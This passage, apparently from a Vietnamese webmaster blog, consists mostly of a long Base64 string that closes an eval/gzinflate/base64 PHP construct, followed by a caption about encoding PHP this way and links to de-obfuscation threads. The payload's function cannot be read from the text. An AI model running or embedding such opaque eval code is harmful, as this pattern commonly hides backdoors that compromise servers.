+4e1dPtdbpF9enpPlmP9SzMT47GWtBw34+wliK2bOieGrdpTd2H0cL9KMzkdT/bCPfDUUtPPwOatNYV1p1CB9k1lu/tLMuuW+v/ufVacv/0Oc5NYX/EmeR+cLbe4Rz1EodEvo05iswtds/8M2oeVitbTu4CTE9/7pQvYQ6Ee79neG7Hucd6usPokaHBgl6y86daI/OJuofOCxOvCPd/833fOSaP8/lijgn1cp3zN8JzIZkBhBaAa9OEqcxzaA+H7KTzT3ova6rIB3uWnTBkB+fpfu392bPVGYTTp25jbc9N7zS4ne/y2ZPvIycH75Z7CO6b4R5o63byZz+bz9KeN/lH4ypilBHWB/TsYbg29kjfS74CDQjPU3iEtRmJzxKry9bB07tOWz6c+ZDUlE3FdI4b8QczqmcKnqOH9fTgeZhbxVwYOFz3luvMgFPhTqw7Jjub9qmHZ9mCoblX1g+Bm2hRszJfdSapf2dP0g8ohqC2wvohO+8IlgYj8OeKD9GrR3cgcYbWg3preql9Ble4lxW9GOqkyO24t1Z3mFkAnhsvu2UNt0fZtfzZp2ygnhcOxDp0+GjZOWqZ0aVltp5n3s86+54L1hVDCDvQq5T35IyabYhv054Su1G724i9iW0V51lDsEflR46ovuufMD71uXzI7p7h2mz6jxzr6v3RoCFHgI4PeSPjH3hgsP6o85FrI/trjfhZ9xK9ZftV+R33Ueu+W+9JZ5q6f8fdshtDcRVxnvvPN4yXz3OWP8hz86iz0RRTELNaZxdOUvYE2zGFtdGzHuBf8Vyes6S4gNmx5OfJlXj2j2LNpro17jAziNCXY86COQXi8lcUpyAfSx/IYn+Jo4TPrPEhu8S8GvrE8OvUpTOzgtk41qV8hzX4HVcozkmbI/9rfc9Dvko+Fy6F92IelXUedMaH1pvaB+tLytZw78Fh5sNW2SP3uhL/cz9n+TL06+kFIU/mWrUtRqPnCF7aNbNwNvcoDY2zbDx6EuAAc9OKc9BFou8SDSTr8yq+Q6caLTL8mOs7sRn38FwJ5hh2nXf6xrw2enby09YZF+Ydwi/UHSQekV1HE4xn6PLT2AL4Vmw+/LB5r0fUPBrwRqvvcR5F9tfxjfAD2BDNO+tcC2fYD7/KFyx9Nlz/kq1PrHmE5/LBDcLB0EcB3ifPzpy9KXxJfMTMCvpK3TOJz5b/IP5iNjBckjVDD92pLXZyHeKM6uM5644ToxO7ei7l0ucdZRPhr61/dSubxdwoZnS4Nh5/doZnPThHc2w8Mr4Pfym/ThyAbvsUfvHcyCOMv6x9T12W8EnTL/KoaFC5l0l+ynM22ZNr2W+0W8ArtoPi4ayHJ06I2VToJFs7poV769G6h09B34U8K7VFnlcFl3AL59GoJ2G2uXnsnadohcGauJAunqALL1qr+gz3aHA3m+wWsX2Tz8k1wj/xb/R87Sg7gd+y5tGjMIo1lmSz8f/U0zdiL2K0Z1jfGV549rKd6IugQ+iZrvLNPuf63RqlLaq/akX1RclnT+yP7idale4D1llzL6XuBTGadZjfG6ew4rcuNrj4Gb9mbtC/SD0fsZh7Ao/CiWi/oINBnzoYoPP7WT4Ondz0qcJ75u7Ez6GFwuwbZi1QS0WuBN+M7p31+GSb0COCB0bzjvfD93k97uE6B/JIA5wgzsq5nRGlNbTxCNSoM7NwXMvXUC9AzmDKRsEBcU89d/fyO5+d5+IsXEJ/9oC7E66nbpJZW+1S92nofqINxGzXPY5Gyz59j7CfdQ91f9E+8Gx4MJd8N/0fecb1ndaen7Wu1vfEHvE+wuPEZ8wpp0eUej32Aq7BMzrA0dxZYo8jSj9vj3PlI9Ztw6KPqNh6hvVf0YIyRj513hSjuF7uFu69B7e435sYX/e6wUFpjeEDdz2jtBHimpx3u4RzF4kH8VuKH6jR94wY+QXOM3VU9Ot17LnqlYZiNzSRrNkDntZ7mPNR7OI6jmtYkwEbQm8VmpzUi4KrrMc6ts9QzAl/wxwRz9zQfaN+Bp1w1xGyV/AN+Gfwos4q3CN50tyLe5jDpY4KTWLnM7B1cAeywfjhnQ8l50ht49AddV9Orz223ZSfQIuffDNaZNb8uNTdM9cxZWMUzxqj6TzQ0wd+Jaft2RrEc/LLthfyH/gNagMa9+EW7lmEQ2MegTUuX4WH93zMqbV2b7DiEvuTZ5S2sLDijpE8v1exg/uVOM9g9RHWcaAvkJ5b52+u4bmyxLPE9Ple+KtnVJ+9YgdqesxfKIZ0X6bO6MAvcjeIHYWR8GtpI4hpdXaoH0OD13y69g/eYsJlCNM5By6bRU94vof+LT0AS+uU/vIe5pI8txC/eoRzPK61nbVOTfcYXSJqDt032cM9TtZ1v9YzGBvrrDMvcOp96HuwFrQwkrlf4em9zhld2i7sZtxxqb01pyWsSH02uUFmUlu7/Gfz47MwFPjZurIzHHPwnp4FTVwvrMQMX7QIyEehvUTtBLac89k3e0YdjetYb1FaAapVYna19XnFz1pTTXeUM8J8C9eyHWFdoVP4ep8lNbZzPXX+/G8Vv3m2hXwateZw4O4FPcIaQ9SxuI5DNpv8qDW4uMs/8SuOXsI22DR0rOh/Yw4FPZlts1ncb+cjZa+aMK31eK91fo2FfsJ1ZdbdbLU25IqmYmB08cmNMBOa2lywJDPYnLOahWnhG4gfF3khxTC7voVnQYFjfwqLu1defIZ7nFv5EbChdekUC3utiCu4C8Kxc7NPtpO3qLxdLzvhuXrC1/RqWKemh+M895DcwnMo0TubOjfueTnC9eFgHnNgemc4U8/HOeus0s9CXQY1XuR/p3AoPgHMZT5v1J8zpyl/ptWdoS+EdYe/Q8vaWsqy/dTDMWPXNRKKIdzLiH0SJvesm2e4LwX+mtyENV+PMPcxhM+cv4cDm1G6ZtgrOBl8by/8QE02/avUywzhZfJL6FfnGX+E502iQYq2iOeNiY8h5mT2DLWq+OYuOwx+hl+mprht2My8PvgLHmOEdbPJ9TKTEP4Um7/7Z9dlDe3bsb0X8YPiVHQjpmIU8mP0Q7qXj/simzdWYTfPOv3RWmznAE5uyN8Rd+TPHVscoP2n3pO5X+aH2NtZfs+9qbLNaDm6puqIihvk95mZgE4HsaT1Kh7bf7f41atAPYl5e8Vg5JDhMtFS5nvRGMvzJ94fjTfrxcvGGrMKV7r+QM+FP/s1F1nxGWsKj+oekJ/y284l98LD2Ly0D++wBqHrEsWPuYYVDlaxHucKO0lfAHnjqbPXdO/RFjR2E0YgbqDnvgurc17yTLzCMxQSXxGXvcKaZeOn8CTaGK6fFI4k5w0+NpZo5dPA90vxp3UNbuHayV//TrGJc3BneH6787v6M/TSPMvwrM9ghuuue0DfKFzg0Blq181OykdQl0gtqOuPtVbEAXDR1srWesKhWyMXO81aCu/AYaKDC75NnoBz0nS/V5hPpl95782lftbzRHW20IbA/6Qvn3X/mdXlekvhDc8e0T4bBx1lY91LpbNJzQ7aXF3PZm20S93RX3jmVv7G+nLvKL3rd8Xe1DWiV07dddovYoKNY3MNzSPcg0T93tD5tQ4W+F8YjvlS1FJZI+wRlWvH1xxhzSH0WNFaJBbAJ7l+T3EjuRb3oOlce74U/lExi/sa4A6E8/KdzvLr6HZTo0wfz68ZLLdwXPJr5iFx89zO9AhrCMAbdnHuzkkrTnDPaau9wD6iy5TnGP8MZ/CM6p9rYa0Pa3vovT13u9f3ub79Etbnz7UT9kCjHq3uXLO25XZnOJ/B7A00S9DINvcszAvuQK946cyhnUF+gNkSnqEgu0mdDTkM93VqD/d5GfgV5gC4PlM+FP4F3Qr7tEv5SPYS3sz9Xtf6OefDFMvBtXsODvGh/Dv50679or4afYZx1LnGHxBnddk/aiPIYzH3Kn2nfM84y679wuePqP4mvYM1uGSX3ffYwzlN5l3CSyVukW/Ic6d85WjVf0DvBBiF3kPPVz3DdbXERuNa9oo7sc+ytzYga6mzYc4f+9bDmi9wX67bGfGL67De27XyGtRkNPkhcsjMn4UfdS0sduVHz9sKM2fMci07Tb8IPSz0So3tPV0beStfQU6aGfPUxni2FRhJmAc9rCW7xP4xB+iXBob4cfQS8a9T+IN8JDWCzGBN2w+ndoT71+kRnTrbeZeEA3/p4LOPTWsku8WcNOeAu/zkLRyDujeL2ED7Qyyw9weii7LXuKNfv9tF154pnibHymzJvEevqHph8Ib8DPrJcFj0ctFbaf0Bcb7YOrAlvBH5fOelicV4pmv5PfMw77D2HvMu3Xd90zpqL1x7Rex7C8+gI5YFu9DfiH9w76nsiPOyz7Au9uRMrvJX9PikDVDcS00N+R1ja95Xdol5PUt8AXqSnsuyovT4jnDdEPVTS7movL96pi67MzfbR37H+p76fPMX4mPNe7/D8Sn13/h3cqVoqU/uk+Ij25NnOL/gfDJne4a5H+Y5ktPw3Pt7YXPPvJ9h/SvfTZ0VdEboeeNM5nMd5S/g/9AWs46S8B9cAhpJzuGNcF+7c+nvsA4E9YT0FKO5mM8MTpMfBVcM7Npt22fF7IkjFGszJ8d65fJXrrFVvhGdEteQyQ8zA8v3Fr+1ai3JFcCvDp0JbMTU+bZenu6Bbav8NRri9N2iwYImInpW5Lnpf0EjJtf1XufftRz4KnDr/D6Lbf8trC+MXiDzEZg7RV5k7fsOnzD0XrKfrgW4hbUerCmO/RGWbeyV3oXcCXq3zPmzHqv8nnOnz6g5g7dwPxl8TJf9YFauZ2ZwLo5w7sN1AfKLcD/U3dNDh4YYPLJr1hS3Wf8ZeyD/iV4UvWS8f64N8c0M19ug07trvaAtan0ycVPw5vSh4g+di4Rvly/wfohnd37iCNf2oW3lGhhhFz63nXVPwfWuERH+IO7ljtIztM/Vo07Bc1NmuNYFToEc3tR/c1az9gS8cgvr/lAr614I3bsuvmjoHKJbZ61ScWfYT3qM4JCMsYSBPPNOeNMzV25hDcWMCxT/0e8MN8h9JWfGjLv0U8fms/Uzntus2BWukhkr+FB4A2sczg1r6K75Xm+8LX0W1MdRj82MFs8Q6WU7vIZnlE7x3L5LZ4D6VtfJiTulZwoNGXS7yfdP7RP1ntR5UisMtnTPg9ba2P0V1unqOr/OPzXZCsXRzBpLHCIbT50qGnT0dzmGF5dFfTHv3RU3eU6W7qlzE/fwjGrPDREXnndL2IR+KPJa+LKdE4Uj2GvtrCk7o3Ins2o80XVwzlk2bN4Ke1srRDafng3mnpkrO8v3g2/NBep5yH03xdLoBVjzUO8+9Avt4dyD7S6Z/zvLBoFZ3Xeq8+N6BZ1zY+ZLcReembftKfmHjC+1vp5tIRuBPs9ea8wcqAVubmEeijoS81OK0akV84xM+Qv7ROEC+sutha07z0xJetOZsQjfwcwN+0kwpHhi1zRcyg9ZL7mXPcp3kH0F11mTWf8Wbd0pe+F5GVorar+JMemTc0z6DvcfwZXkvdc+uwcaHuT6/X7PpsFurrCuC5qM7qEQB0yvNXU15Jj2udzU21F7l98Bt6z41f1swk6ei/4M10vDR3qOi/wL9Qmegf2sPWOWMTllzyjSOlJXDX9BToAaROIw9w7oPNFPZ73Bx+bjdVfBYVmPDKZUnJ3v8i4fQ+00fsr510f1KngWpjgd5ytl45mDNMARxJrP4ubBccTl6MdZP+cM60QyY4N+Wfw5+geuAzuqnhsMgr6feW/5F+eY5fPcW0N+g3cRzoHjtw6CziM9mnAT2HJm/ixhqIxDZCPyc8Qx4RvoXaV2zRqEiq2p+bc9IAcyt/utfIvnqujskEsaivM9D7GFe5Y8AwEOByxwC8dtTdzqL+x01FlFs6uJx+IeuiZa55E6+ibfOTbb+kv7/RnO59BrSE4E7tb13/g7/Lx4NvqR0TRyHnWGe8SYgU0+yHHcLGxlDVUws3A/+iBoS6E/bw112QlzxCN+aa3tMwnBRq6J4vl1rsG68FzUS3MfsS3gKDh5dP2MEYV5XFsEx4WdOssvuz9CeJa6Vmw3s6nxKe6jbeGYh7wmWGTs9/gV1bNz1TPKLjM7hblL1NbsdVHwi8T26LGkbxBfwuxoNIuY+Qq/xBqmHbuF4z5r2DzCesWeOQWekI+n5szzrt5aN/yr7kFiE+1F/qzOCT3w1MvvvJ3r8VjXWfbL9m1U36xn2Og5+U60WzhP9Jita9mjIZxLjQA6edQ4cMdYC3SHqVe2PulZ+G2f7Yo2zlrlW/b5AKyjeW/dQbRLPefkod/xn7Iv9H2jZezeKWEucAoap/lvwITC9fTOW19UONpxuThU+mSp/7e2tXApGqzwGx2bxB62cA7Ceh/ChMziyn9LPkL2xDrlo+6x84+P+IXbrI+mGHPJB1BbRv4MXR3W3/ku2VhqTdELpfYjbcAtajYImER7jf32THbFEI6p4JN/oub1aN2GMBn9Gbl/wtCeYSDcaj5LcQj8K/PRqV9tvIt8FL03zM2l7oYeCfNH91o75mU5JwNuFo8y8M+j8DK5UGpAqY+iX9taU7pz5r7PcB50gRf0efvMO3KK1CBQBz7BuuRxzqiaCnFl8GvuRwQf3MKcCPiNeRP4Ys+f4O7JHxPHeXa2Pp877Ly2zi5cGvVzrhW6bthK+IdeQXNbl/JZ5HvdH6I1ox4S/Qz3Qsnn73M8WVew3dQe0BsDZ0Pc1IVDp3w/NZ3UqO29DNhr/F0XNocfZzYVOhRgaDSTcr+EkaiTWLqT6T9l09zrJ6zF/Bnz18qN5Zna4ivXBsyo+nPsjnyDdQmxmXo+cnu8P73+1rHRnjHv0j2JijnREHRcSww4yz/Dy1tjXJjOvV3wHPKJ5H6NX17h3gry2WguWTdr/13xk2uSdCa9H/oua3u1OnfoPJoPI78mPws/RS8d+pfUQ6LBYUz3juqVEOayVuqM0grdYmzw1JiFqTz/dZUvoc9kggXk85wbPOrz914i66yAs6furnCee47O7f1lb/q19m6NOhv0MxOfmIPmPgrjM1vM2savMIajZ6D1woZTcUGeO9lLarSw9+kXZe/ID1LvQu0IcYFrsYVN4TAbXCgYUzlE4z35ZWY0Uf/DebKeySPcj0S+PN8FXkJ20hhWMSKc2698LrH9c8sxHZtNB8vjG/baa+IeYT04dep1rJEv3+i6lNemOXEr3LPHG2jlNOFQerby+Tc/Qu2T9b8VM8EDoTueOEzvi56A57YKL6X/uYdrOzrx7dzO0iMqDulRWhmyyeDVIW51EU9hWy7Cetonal3Qh4Ar9NyTZ1QNp55xn32Ob0BL3r2rG5Zxfgm8iq/tYS1P7NQYZc+Yt2JNc/lFa9E23eNruBbSscal1mAQi+gOj+3MeUbSDOeef/kPrSu9K2h05rsLj1mLUX4VjOP+SP77oXMHZuNM6lwueBKwnmKKXbMT3OC8JvGj4sCh2It+k/yzFlX3KC6S/hLq+aiLS/un70STyXXiK8ypeR90btBUo7YnfY4wWq4L+LzL7qyy6dYdxr4qvrFWwyNc44RWKzwF/M3eY5I2b7c/OmPWxW1RsfqUvRImds2E4ivnIOV30WfYeyTSVukeYM+G1occOfcGvtJx7kO+VrHznmun1jZzBFp75stZV/0e1YOuM21ddOILYnjZxyl/CY9h3vIMx5zobaF7BcdHrI9eyWTN8D+yv+j9oI2T36l1d83phtvQfrN+rfIgaJsRu6ApbW1ExRCem8n+ypYT3zK/izyXawf7d82Z30dNMnkv5411XogpsYXU+LkXQriYeknm9FgXE7+FDdF5My8nzMp8ZrgZ648/wppyrr+4yz/Dya468+53Ojf/eoYx6QLjP77PgJZC3ote62gOTrEluhXUNhET0KPN7IBf9dbCs0ucAt9BzQhzb6mnJY9mnuhWPpI+Zu4Veae9jpaeZ2O+d1Q/nnynNakVY5mnutV64Pe5t/BV7vO41zvBjYEdrIWmfALcCH3O6MeDA5xLJYb+iaoNIt931PfBtXkuavs+c/rSFqWddg3XmXnmMXhXmII+ww7+w48Kd+x1284VyOZ18QfgX2JZMOGv2gzx1l3PSt0gcyZcIyC7mn//1h0TZmVuVr7zEcYv3p9Z+7Zk63bO09oxiiet368YDj6D/go0KaxfjN0TvmFuk/tHxFuhv8ecYnLQ9Cx77u+IwqH4XNlH8z08tzAM/c7cF/uxVmfMHAj+i7hW95/aJfPh4IifqPpb4Svm39DXkOs7qld5Cmswl4gaPvpS6RGyVuX2/a6ZvoXzO8yXZm45+7XgfMHFur++i7Kx6XeJgWY4v0+dI5oJ8LH0aqMpz9lzP4Niw1O4DY4QfQ/yY1N3YtdRdGyGHzvKzrpGQH4obYRiOPqmqV33HB+9I5yHZ9DJxtk/wdHKp7t26ijswj6SLyK34Hkl+GlyNfLj6Z/e4Rll9GRwz7AV7lN7fL+rnYVXic/QCfQsDvZm1LO7/5D4eeM40LGx35YNR8/EeelLnancg3tU/ZLsErVB1EIwF8Caf9g68e3WuYWX0jugm+e5CO+6m+5hkc0dxIyPqBhJzwVXxIxEZvxQN0cc4DmnwoLUbVvbaoY17JlLYew4tR6vcH+C57AI56LBldhReRs478QYG0Zx7kQ8RNM92PFL031z7kJxtTW+zvJL7CF109gDeoVznc7aK+thChf90mU9wj1D1BpY20/rsedr/HPPKE0s/R2+w/0nikeHvtccC1yH/Jv1jfTsfdS5yTuvmBO8jiZBno9L+a2udybfYT2IGRWPvqPm/Il/Httn8XNoLaGfAAdt/fyHfudOvOpcMgeT+i3PdJC9ce+57KnvOPk97Y9rCs+oHqhW779rafhcyxfkWQKXEl+Ll+X+Up+JXiHzlcl9oNHsHj/dWfTkzMXd5Xce4bjFuYft3qBF4v70V/zituE7WAP0Sekdoa7U2mvaA+bn2Qf81D2g7tB6CJyj5/bfR+Fzz/UTR7T3OjH3s4mH8nzSe7ink7ox/N5Q3OeaBd0V1xXJD8M1owXmnmnsmPwatTCeO3aPinf1zJ7BpfNvvg3bDJ5UTEQ/Djgh79YrHP/Qs0ueaYhv4L4PxWfWg5Q9RPPbc52fWjOtD/o1o2/nYYu1Petnla1F3zPz0ODIXnfcMx71LNgDz8A8wr0M1tFmXY7yrdQauU71HZ5f4NmAwiR/920TZy3h63wucmRHuA+FXq0me8+8bOcHblE96oodXF8zvn7bfSL47HeYKwcrgdVyfbUncEbspeshRmF2z24YUdib/JFsiPvpea4ZpXv1/gt7Ccd6ZleL0uK4yAaNcF07unnWc8QWvjdMIZ/ZxXcYRwk/ECdZ/3+Gdfk7HIjW0Trl2jf3AOKXFHekr+phbAz+/9Ufdykf6tgXTAaeem72c4bnYdGn5Rl4wr/Oh4NV4LOE26kbQd+H58kzsuQrxRlSOzqJUTmnr6gczls2Sv6S+i/34MGbnOEac/sL/MhNn7flFOGj3d8Dzn6G4xu0e5ntRvyT3y07au5UdwauAnuCjXbPMs/01F1UvGJd7TOcm8LX00tqrX89m+ttznDNB3Mt8ZtgLZ+R+b0vrjuY2id4BcVh9DpTm7HHC56Tcw3PifG/XWFdUWvQbP8PVmzCXvhWajdPxTxTZ2pwXp7fX+fnMx9611Pn/P/1/xULnZ9fD/3++fW5k/d/+4/X/7r9z//2z3893o/nP/79H//8877rmv9xG/OW//GZZvLf/+N/Aw==')));","");
code PHP mã hóa Eval + gzinflate + Base64 ;) http://yeuquangngai.net/42-Webmaster...e-+-Base64.yqn code PHP mã hóa Recursive De-Obfuscating ;) http://yeuquangngai.net/42-Webmaster...bfuscating.yqn 
  
  
  
   ---------- Nguồn www.yeuquangngai.net |
No comments:
Post a Comment